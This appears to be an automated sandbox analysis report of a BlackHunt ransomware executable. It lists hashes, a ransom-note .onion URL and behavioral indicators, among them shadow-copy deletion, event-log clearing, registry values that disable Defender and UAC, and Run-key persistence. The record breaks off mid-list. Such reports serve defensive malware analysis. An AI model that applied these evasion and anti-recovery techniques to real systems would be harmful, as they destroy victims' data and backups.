Analysis
-
max time kernel
140s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
28-01-2024 19:17
Static task
static1
Behavioral task
behavioral1
Sample
048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe
Resource
win10v2004-20231215-en
General
-
Target
048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe
-
Size
707KB
-
MD5
f0371165d6ab178c3e627d10e2883834
-
SHA1
44835455ad0f34b1365e66c1baa0686a8172cd9e
-
SHA256
5fc7a843bd4442b83c53dc791a0373835ade101034cd7f3a92759e31d1ca4033
-
SHA512
7c3d87af00864d1e2230a409119106629f48685d8fa664efe75ba49aaa26177752cb6fc34151826b1ce5422f7933156436621411b8176bb0e65aa6c8c5ddc470
-
SSDEEP
6144:QcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1F80vnh:auaTmkZJ+naie5OTamgEoKxLWQKh
Malware Config
Extracted
C:\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 6480 fsutil.exe 7400 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3824 wevtutil.exe 10520 wevtutil.exe 2928 wevtutil.exe 4264 wevtutil.exe 7196 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6008 bcdedit.exe 6508 bcdedit.exe 8400 bcdedit.exe 6728 bcdedit.exe -
Renames multiple (3376) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 1996 wbadmin.exe 7200 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Y: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\V: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\T: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\A: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\L: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\H: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\X: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\N: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\Q: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\P: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Z: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\M: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\B: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\R: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\J: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\G: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\K: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\O: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\S: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\U: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\I: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\W: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened (read-only) \??\E: 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\relaxngdatatype.md 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\ui-strings.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\cs-cz\PlayStore_icon.svg 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\ui-strings.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\ui-strings.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\management.properties 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-sl\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ar-ae\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fi-fi\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\eu-es\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\nub.png 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\selector.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\accessibility_poster.jpg 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_organize_18.svg 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot_2x.png 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-ae\ui-strings.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\tr-tr\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\zh-cn\ui-strings.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\css\main.css 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\bg_get.svg 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-sl\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\ui-strings.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ar-ae\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\he-il\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\ui-strings.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\uk-ua\#BlackHunt_ReadMe.txt 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-selector.js 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#BlackHunt_ReadMe.hta 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons.png 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\#BlackHunt_Private.key 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 11952 11756 WerFault.exe 289 -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3036 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4564 vssadmin.exe 6820 vssadmin.exe 9152 vssadmin.exe 6080 vssadmin.exe 11220 vssadmin.exe 1580 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 6132 taskkill.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" DllHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon DllHost.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 9456 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Token: SeRestorePrivilege 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Token: SeBackupPrivilege 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Token: SeTakeOwnershipPrivilege 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Token: SeAuditPrivilege 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Token: SeSecurityPrivilege 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Token: SeIncBasePriorityPrivilege 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe Token: SeBackupPrivilege 8068 vssvc.exe Token: SeRestorePrivilege 8068 vssvc.exe Token: SeAuditPrivilege 8068 vssvc.exe Token: SeBackupPrivilege 5908 wbengine.exe Token: SeRestorePrivilege 5908 wbengine.exe Token: SeSecurityPrivilege 5908 wbengine.exe Token: SeSecurityPrivilege 4264 wevtutil.exe Token: SeBackupPrivilege 4264 wevtutil.exe Token: SeSecurityPrivilege 7196 wevtutil.exe Token: SeBackupPrivilege 7196 wevtutil.exe Token: SeSecurityPrivilege 3824 wevtutil.exe Token: SeBackupPrivilege 3824 wevtutil.exe Token: SeSecurityPrivilege 10520 wevtutil.exe Token: SeBackupPrivilege 10520 wevtutil.exe Token: SeSecurityPrivilege 2928 wevtutil.exe Token: SeBackupPrivilege 2928 wevtutil.exe Token: SeDebugPrivilege 6132 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1784 wrote to memory of 5012 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 88 PID 1784 wrote to memory of 5012 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 88 PID 1784 wrote to memory of 4048 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 90 PID 1784 wrote to memory of 4048 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 90 PID 1784 wrote to memory of 2652 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 92 PID 1784 wrote to memory of 2652 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 92 PID 1784 wrote to memory of 668 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 94 PID 1784 wrote to memory of 668 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 94 PID 1784 wrote to memory of 688 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 96 PID 1784 wrote to memory of 688 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 96 PID 5012 wrote to memory of 3992 5012 cmd.exe 98 PID 5012 wrote to memory of 3992 5012 cmd.exe 98 PID 4048 wrote to memory of 2828 4048 cmd.exe 99 PID 4048 wrote to memory of 2828 4048 cmd.exe 99 PID 1784 wrote to memory of 1520 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 172 PID 1784 wrote to memory of 1520 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 172 PID 1784 wrote to memory of 2488 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 100 PID 1784 wrote to memory of 2488 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 100 PID 2652 wrote to memory of 2312 2652 cmd.exe 104 PID 2652 wrote to memory of 2312 2652 cmd.exe 104 PID 668 wrote to memory of 2904 668 cmd.exe 164 PID 668 wrote to memory of 2904 668 cmd.exe 164 PID 1784 wrote to memory of 3628 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 107 PID 1784 wrote to memory of 3628 1784 048ba2b1bdcaab51b2d59baf361186ae10b061447a3d4b056f72a09c4baf6449.exe 107 PID 688 wrote to memory of 